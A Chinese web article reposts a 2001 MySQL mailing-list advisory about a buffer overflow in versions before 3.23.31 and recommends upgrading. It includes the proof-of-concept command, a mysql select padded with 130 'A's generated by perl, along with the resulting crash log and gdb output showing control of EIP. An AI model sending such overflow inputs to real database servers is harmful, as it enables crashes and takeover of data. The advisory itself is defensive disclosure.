用户名:
密 码: 记住
您当前的位置:首页 > 网络编程 > mysql教程

MySQL3.23.31之前版本的安全漏洞

时间:2015-01-23  来源:西部数据  作者:西部数据

所有小于 3.23.31 版本的 MySQL 都存在一个缓冲溢出漏洞导致MySQL 崩溃。使攻击者获得 mysqld 权限,而可以操纵所有数据库。攻击的前提是必须有一个合法的登录名和口令。

下面为最初发表于 MySQL 邮件列表的信件摘要。
==================================================
漏洞是由Jo?o Gouveia 于1月12日发现的:

步骤:

在第一个终端上启动 mysql:

spike:/var/mysql # /sbin/init.d/mysql start

在另外一个终端上输入:

jroberto@spike:~ > mysql -p -e ’select a.’`perl -e’printf("A"x130)’`’.b’

Enter password:

(没有反应?按^C退出)

在第一台终端上会显示:

  1. spike:/var/mysql # /usr/bin/safe_mysqld: line 149: 15557 Segmentation fault  
  2. nohup  
  3. $ledir/mysqld --basedir=$MY_BASEDIR_VERSION --datadir=$DATADIR --skip-lockin  
  4. "$@" >>$err_log 2>&1>  
  5. Number of processes running now: 0  
  6. mysqld restarted on Fri Jan 12 07:10:54 WET 2001  
  7. mysqld daemon ended 

使用 gdb 显示结果如下:

  1. (gdb) run  
  2. Starting program: /usr/sbin/mysqld  
  3. [New Thread 16897 (manager thread)]  
  4. [New Thread 16891 (initial thread)]  
  5. [New Thread 16898]  
  6. /usr/sbin/mysqld: ready for connections  
  7. [New Thread 16916]  
  8. [Switching to Thread 16916]  
  9.  
  10. Program received signal SIGSEGV, Segmentation fault.  
  11. 0x41414141 in ?? ()  
  12. (gdb) info all-registers  
  13. eax 0x1 1  
  14. ecx 0x68 104  
  15. edx 0x8166947 135686471  
  16. ebx 0x41414141 1094795585  
  17. esp 0xbf5ff408 0xbf5ff408  
  18. ebp 0x41414141 0x41414141  
  19. esi 0x41414141 1094795585  
  20. edi 0x0 0  
  21. eip 0x41414141 0x41414141  
  22. eflags 0x10246 66118  
  23. cs 0x23 35  
  24. ss 0x2b 43  
  25. ds 0x2b 43  
  26. es 0x2b 43  
  27. fs 0x0 0  
  28. gs 0x0 0 

其中的 eip 指示就是缓冲溢出了。

解决办法就是升级到 3.23.31。所以,各位如果还没有把数据库升级到最新版本,请赶快行动。

来顶一下
返回首页
返回首页
推荐资讯
WiFi太不安全:7岁女孩11分钟内入侵公共网络 WiFi太不安全:7岁女孩11分钟内入侵近期刚刚发布研究说WiFi网络能获得人们手机里多少私人信息,
不服跑个分?人工智能也出现“刷分”乱象 不服跑个分?人工智能也出现“刷分2014年,人工智能领域突然爆发,成为了科研和科技创业的热门
相关文章
栏目更新
栏目热门